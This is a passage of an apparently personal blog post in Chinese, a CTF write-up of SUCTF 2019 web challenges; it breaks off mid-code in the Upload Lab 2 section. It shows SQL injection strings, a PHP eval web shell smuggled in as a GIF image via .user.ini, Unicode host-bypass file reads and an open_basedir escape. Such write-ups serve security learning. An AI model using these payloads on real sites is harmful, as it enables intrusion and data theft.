<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/HeadPortrait-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/HeadPortrait-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('http://www.xianfish.xyz').hostname,
    root: '/',
    scheme: 'Muse',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="0x01 EasySQL 这是一个考察堆叠注入的题目，但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造  *,1 这样构造，最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容，就能够直接获得flag">
<meta name="keywords" content="CTFWEB">
<meta property="og:type" content="article">
<meta property="og:title" content="SUCTF2019WEB">
<meta property="og:url" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/index.html">
<meta property="og:site_name" content="Hi~">
<meta property="og:description" content="0x01 EasySQL 这是一个考察堆叠注入的题目，但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造  *,1 这样构造，最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容，就能够直接获得flag">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0101.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0102.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0103.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0104.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0105.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0201.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0202.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0203.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0204.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0301.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0302.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0304.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0404.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0405.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0406.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0407.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0501.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0502.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0503.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0504.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0505.png">
<meta property="og:updated_time" content="2020-01-11T07:48:20.268Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SUCTF2019WEB">
<meta name="twitter:description" content="0x01 EasySQL 这是一个考察堆叠注入的题目，但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造  *,1 这样构造，最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容，就能够直接获得flag">
<meta name="twitter:image" content="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/0101.png">

<link rel="canonical" href="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>SUCTF2019WEB | Hi~</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hi~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">人生总有各种理由将一个人变成一个five!</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://www.xianfish.xyz/2019/11/01/SUCTF2019WEB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/HeadPortrait.png">
      <meta itemprop="name" content="瑟瑟发抖咸鱼黄">
      <meta itemprop="description" content="您看！工具人啥都不配拥有!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hi~">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SUCTF2019WEB
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-11-01 08:55:38" itemprop="dateCreated datePublished" datetime="2019-11-01T08:55:38+08:00">2019-11-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-01-11 15:48:20" itemprop="dateModified" datetime="2020-01-11T15:48:20+08:00">2020-01-11</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="0x01-EasySQL"><a href="#0x01-EasySQL" class="headerlink" title="0x01 EasySQL"></a>0x01 EasySQL</h2><p><img src="/2019/11/01/SUCTF2019WEB/0101.png" alt="0101"></p>
<p>这是一个考察堆叠注入的题目，但是这道题因为作者的过滤不够完全所以存在非预期解</p>
<p>非预期解</p>
<p>直接构造  <code>*,1</code> 这样构造，最后拼接的查询语句就变成了 <code>select *,1||flag from Flag</code>,可以直接得到当前表中的全部内容，就能够直接获得flag</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0102.png" alt="0102"></p>
<a id="more"></a>
<p>正常解题</p>
<p>堆叠注入，先构造 <code>1;show tables;#</code>可以得到当前的表信息</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0103.png" alt="0103"></p>
<p>并且根据回显，我们可以大致判断查询语句为： <code>... POST[&#39;query&#39;]||flag ...</code></p>
<p>直接构造 <code>1;select * from Flag;#</code> 出现<code>Nonono</code>, 可以知道存在过滤，过滤了flag</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0104.png" alt="0104"></p>
<p>这时候，通过堆叠注入，设置 <code>sql_mode</code> 的值为 <code>PIPES_AS_CONCAT</code>，从而将 || 视为字符串的连接操作符而非或运算符,所以构造出来的payload为：<code>1;set sql_mode=PIPES_AS_CONCAT;select 1</code></p>
<p>得到flag</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0105.png" alt="0105"></p>
<h2 id="0x02-CheckIn"><a href="#0x02-CheckIn" class="headerlink" title="0x02 CheckIn"></a>0x02 CheckIn</h2><p>上传文件的时候发现,上传扩展名为aaa的文件，回显<code>&amp;lt;? in contents!</code>，说明文件的内容不能包含&lt;?，可以知道上传的时候是黑名单过滤，直接把文件的尾缀改为jpg，回显<code>exif_imagetype:not image!</code></p>
<p>猜测后端应该调用了php的<code>exif_imagetype()</code>函数，这个很好绕过，添加图片文件头就可以了，我这里添加的是GIF89a,上传成功一个文件之后，在回显中，发现上传目录中存在<code>index.php</code>文件</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0201.png" alt="0201"></p>
<p>这里就可以知道需要用到<code>.user.ini</code>文件了，先上传一个<code>.user.ini</code>文件，上传文件内容为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">auto_prepend_file=&quot;test.png&quot;</span><br></pre></td></tr></table></figure>
<p>通过<code>auto_prepend_file</code>指定需要包含的文件，这里我包含了一个<code>test.png</code></p>
<p><img src="/2019/11/01/SUCTF2019WEB/0202.png" alt="0202"></p>
<p>接着在上传需要包含进去的<code>test.png</code>文件，文件内容为：</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">&lt;script language=&quot;php&quot;&gt;eval($_POST[&apos;five&apos;])&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/01/SUCTF2019WEB/0203.png" alt="0203"></p>
<p>这时候，其实就把test.png文件里面的一句话包含进了上传文件目录里的index.php文件中，可以直接在index.php中执行一句话，蚁剑连上，可以在文件中找到flag，读取就好</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0204.png" alt="0204"></p>
<p>贴一篇优秀的文章</p>
<p><a href="https://wooyun.js.org/drops/user.ini文件构成的PHP后门.html" target="_blank" rel="noopener">https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html</a></p>
<h2 id="0x03-Pythonginx"><a href="#0x03-Pythonginx" class="headerlink" title="0x03 Pythonginx"></a>0x03 Pythonginx</h2><p>进入页面后给了源码：</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&apos;/getUrl&apos;, methods=[&apos;GET&apos;, &apos;POST&apos;])</span><br><span class="line"></span><br><span class="line">def getUrl():</span><br><span class="line"></span><br><span class="line">  url = request.args.get(&quot;url&quot;)</span><br><span class="line"></span><br><span class="line">  host = parse.urlparse(url).hostname</span><br><span class="line"></span><br><span class="line">  if host == &apos;suctf.cc&apos;:</span><br><span class="line"></span><br><span class="line">    return &quot;我扌 your problem? 111&quot;</span><br><span class="line"></span><br><span class="line">  parts = list(urlsplit(url))</span><br><span class="line"></span><br><span class="line">  host = parts[1]</span><br><span class="line"></span><br><span class="line">  if host == &apos;suctf.cc&apos;:</span><br><span class="line"></span><br><span class="line">   return &quot;我扌 your problem? 222 &quot; + host</span><br><span class="line"></span><br><span class="line">  newhost = []</span><br><span class="line"></span><br><span class="line">  for h in host.split(&apos;.&apos;):</span><br><span class="line"></span><br><span class="line">    newhost.append(h.encode(&apos;idna&apos;).decode(&apos;utf-8&apos;))</span><br><span class="line"></span><br><span class="line">  parts[1] = &apos;.&apos;.join(newhost)</span><br><span class="line"></span><br><span class="line">  \#去掉 url 中的空格</span><br><span class="line"></span><br><span class="line">  finalUrl = urlunsplit(parts).split(&apos; &apos;)[0]</span><br><span class="line"></span><br><span class="line">  host = parse.urlparse(finalUrl).hostname</span><br><span class="line"></span><br><span class="line">  if host == &apos;suctf.cc&apos;:</span><br><span class="line"></span><br><span class="line">    return urllib.request.urlopen(finalUrl).read()</span><br><span class="line"></span><br><span class="line">  else:</span><br><span class="line"></span><br><span class="line">    return &quot;我扌 your problem? 333&quot;</span><br><span class="line"></span><br><span class="line">  &lt;!-- Dont worry about the suctf.cc. Go on! --&gt;</span><br><span class="line"></span><br><span class="line">  &lt;!-- Do you know the nginx? --&gt;</span><br></pre></td></tr></table></figure>
<p>这题的出题思路来自于今年BlackHat的一个议题，相关PPT如下：</p>
<p><a href="https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf" target="_blank" rel="noopener">https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf</a></p>
<p>其中关于Python的内容如下：</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0301.png" alt="0301"></p>
<p>大佬写的一个脚本，用来寻找可用字符：</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">\# coding:utf-8 </span><br><span class="line"></span><br><span class="line">for i in range(128,65537):  </span><br><span class="line"></span><br><span class="line">  tmp=chr(i)  </span><br><span class="line"></span><br><span class="line">  try:    </span><br><span class="line"></span><br><span class="line">    res = tmp.encode(&apos;idna&apos;).decode(&apos;utf-8&apos;)    </span><br><span class="line"></span><br><span class="line">    if(&quot;-&quot;) in res:      </span><br><span class="line"></span><br><span class="line">      continue    </span><br><span class="line"></span><br><span class="line">    print(&quot;U:&#123;&#125;  A:&#123;&#125;   ascii:&#123;&#125; &quot;.format(tmp, res, i))  </span><br><span class="line"></span><br><span class="line">  except:    </span><br><span class="line"></span><br><span class="line">    pass</span><br></pre></td></tr></table></figure>
<p>下面就是寻找利用方式了，根据题目中的提示：</p>
<p>前面的url部分应该是suctf.cc</p>
<p>还提到了Nginx，Nginx的配置文件目录为：<code>/usr/local/nginx/conf/nginx.conf</code></p>
<p>跑上述脚本的的时候，其中有一个可利用字符： </p>
<p>​    由此可以想到构造：<code>file://suctf.c℆sr/local/nginx/conf/nginx.conf</code>（另一种绕过方式是利用ℂ来代替c及进行绕过），这样可以读到flag的位置：</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0302.png" alt="0302"></p>
<p>最后构造payload：<code>file://suctf.c℆sr/fffffflag</code></p>
<p><img src="/2019/11/01/SUCTF2019WEB/0304.png" alt="0304"></p>
<h2 id="0x04-EasyWeb"><a href="#0x04-EasyWeb" class="headerlink" title="0x04 EasyWeb"></a>0x04 EasyWeb</h2><p>题目页面给了源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function get_the_flag()&#123;</span><br><span class="line"></span><br><span class="line">  // webadmin will remove your upload file every 20 min!!!! </span><br><span class="line"></span><br><span class="line">  $userdir = &quot;upload/tmp_&quot;.md5($_SERVER[&apos;REMOTE_ADDR&apos;]);</span><br><span class="line"></span><br><span class="line">  if(!file_exists($userdir))&#123;</span><br><span class="line"></span><br><span class="line">  mkdir($userdir);</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  if(!empty($_FILES[&quot;file&quot;]))&#123;</span><br><span class="line"></span><br><span class="line">    $tmp_name = $_FILES[&quot;file&quot;][&quot;tmp_name&quot;];</span><br><span class="line"></span><br><span class="line">    $name = $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line"></span><br><span class="line">    $extension = substr($name, strrpos($name,&quot;.&quot;)+1);</span><br><span class="line"></span><br><span class="line">  if(preg_match(&quot;/ph/i&quot;,$extension)) die(&quot;^_^&quot;); </span><br><span class="line"></span><br><span class="line">    if(mb_strpos(file_get_contents($tmp_name), &apos;&lt;?&apos;)!==False) die(&quot;^_^&quot;);</span><br><span class="line"></span><br><span class="line">  if(!exif_imagetype($tmp_name)) die(&quot;^_^&quot;); </span><br><span class="line"></span><br><span class="line">    $path= $userdir.&quot;/&quot;.$name;</span><br><span class="line"></span><br><span class="line">    @move_uploaded_file($tmp_name, $path);</span><br><span class="line"></span><br><span class="line">    print_r($path);</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$hhh = @$_GET[&apos;_&apos;];</span><br><span class="line"></span><br><span class="line">if (!$hhh)&#123;</span><br><span class="line"></span><br><span class="line">  highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">if(strlen($hhh)&gt;18)&#123;</span><br><span class="line"></span><br><span class="line">  die(&apos;One inch long, one inch strong!&apos;);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if ( preg_match(&apos;/[\x00- 0-9A-Za-z\&apos;&quot;\`~_&amp;.,|=[\x7F]+/i&apos;, $hhh) )</span><br><span class="line"></span><br><span class="line">  die(&apos;Try something else!&apos;);</span><br><span class="line"></span><br><span class="line">$character_type = count_chars($hhh, 3);</span><br><span class="line"></span><br><span class="line">if(strlen($character_type)&gt;12) die(&quot;Almost there!&quot;);</span><br><span class="line"></span><br><span class="line">eval($hhh);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>代码分为两部分，上面是<code>get_the_flag()</code>函数，应该是一个文件上传功能的验证函数，下面是通过 <code>_</code> 传参进去，如果能通过一系列的检验则可以执行eval()函数。如果这题是考RCE的话，为什么还要给出文件上传的代,再看那些过滤，几乎很难去绕过，于是考虑调用<code>get_the_flag()</code>函数来看看可不可以通过文件上传功能</p>
<p>所以接下来要构造payload绕过正则检测并且调用<code>get_the_flag()</code> ,这里的过滤非常严格，几乎过滤了所有可见字符，可以看下这篇文章 <a href="https://www.leavesongs.com/penetration/webshell-without-alphanum.html" target="_blank" rel="noopener">https://www.leavesongs.com/penetration/webshell-without-alphanum.html</a> </p>
<p>就可以知道如何来绕过了，这里可以利用不可见字符的异或来构造，脚本如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ?&gt;&quot;)</span><br></pre></td></tr></table></figure>
<p>然后利用Postman分别构造上传<code>.htaccess</code>和<code>shell.lethe</code>:</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0404.png" alt="0404"></p>
<p><img src="/2019/11/01/SUCTF2019WEB/0405.png" alt="0405"></p>
<p>得到了文件路径  <code>upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.lethe</code></p>
<p>利用shell.lethe执行命令了，但是还需要绕过<code>open_basedir</code>。</p>
<p>参考：从PHP底层看open_basedir bypass</p>
<p> <a href="https://skysec.top/2019/04/12/从PHP底层看open-basedir-bypass/#ini-set覆盖问题探索" target="_blank" rel="noopener">https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/#ini-set覆盖问题探索</a> </p>
<p>于是构造payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=chdir(&apos;/tmp&apos;);mkdir(&apos;lethe&apos;);chdir(&apos;lethe&apos;);ini_set(&apos;open_basedir&apos;,&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);ini_set(&apos;open_basedir&apos;,&apos;/&apos;);var_dump(ini_get(&apos;open_basedir&apos;));var_dump(glob(&apos;*&apos;));</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/01/SUCTF2019WEB/0406.png" alt="0406"></p>
<p>得到flag位置后，最后读取flag即可，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=chdir(&apos;/tmp&apos;);mkdir(&apos;lethe&apos;);chdir(&apos;lethe&apos;);ini_set(&apos;open_basedir&apos;,&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);chdir(&apos;..&apos;);ini_set(&apos;open_basedir&apos;,&apos;/&apos;);var_dump(ini_get(&apos;open_basedir&apos;));var_dump(file_get_contents(THis_Is_tHe_F14g));</span><br></pre></td></tr></table></figure>
<p> <img src="/2019/11/01/SUCTF2019WEB/0407.png" alt="0407"></p>
<h2 id="0x05-Upload-Lab-2"><a href="#0x05-Upload-Lab-2" class="headerlink" title="0x05 Upload Lab 2"></a>0x05 Upload Lab 2</h2><p>题目给了源码，所以就是进行代码审计</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">class Ad&#123;</span><br><span class="line">   ......</span><br><span class="line">   function __destruct()&#123;</span><br><span class="line">     getFlag($this-&gt;ip, $this-&gt;port);</span><br><span class="line">     //使用你自己的服务器监听一个确保可以收到消息的端口来获取flag</span><br><span class="line">   &#125;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line">if($_SERVER[&apos;REMOTE_ADDR&apos;] == &apos;127.0.0.1&apos;)&#123;</span><br><span class="line">   if(isset($_POST[&apos;admin&apos;]))&#123;</span><br><span class="line">     </span><br><span class="line">     $ip = $_POST[&apos;ip&apos;];   //你用来获取flag的服务器ip</span><br><span class="line">     $port = $_POST[&apos;port&apos;]; //你用来获取flag的服务器端口</span><br><span class="line"></span><br><span class="line">$clazz = $_POST[&apos;clazz&apos;];</span><br><span class="line">     $func1 = $_POST[&apos;func1&apos;];</span><br><span class="line">     $func2 = $_POST[&apos;func2&apos;];</span><br><span class="line">     $func3 = $_POST[&apos;func3&apos;];</span><br><span class="line">     $arg1 = $_POST[&apos;arg1&apos;];</span><br><span class="line">     $arg2 = $_POST[&apos;arg2&apos;];</span><br><span class="line">     $arg2 = $_POST[&apos;arg3&apos;];</span><br><span class="line">     $admin = new Ad($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3);</span><br><span class="line">     $admin-&gt;check();</span><br><span class="line">   &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> ......</span><br></pre></td></tr></table></figure>
<p>也就是说需要通过SSRF来反序列化触发getFlag函数，所以继续查看代码</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#class.php</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">   function getMIME()&#123;</span><br><span class="line">     $finfo = finfo_open(FILEINFO_MIME_TYPE);</span><br><span class="line">     $this-&gt;type = finfo_file($finfo, $this-&gt;file_name);</span><br><span class="line">     finfo_close($finfo);</span><br><span class="line">   &#125;</span><br><span class="line"> ......</span><br></pre></td></tr></table></figure>
<p>参考zsx的文章：<a href="https://links.jianshu.com/go?to=https%3A%2F%2Fblog.zsxsoft.com%2Fpost%2F38" target="_blank" rel="noopener">https://blog.zsxsoft.com/post/38</a>，查看finfo_file的底层代码</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0501.png" alt="0501"></p>
<p>阔以发现finfo_file也调用了，所以finfo_file也是能够触发phar反序列化的，那么就可以利用SoapClient来通过SSRF以POST方式访问到admin.php文件。不过在func.php中又做了限制</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> <span class="keyword">include</span> <span class="string">'class.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">"submit"</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">"url"</span>])) &#123;</span><br><span class="line">   <span class="keyword">if</span>(preg_match(<span 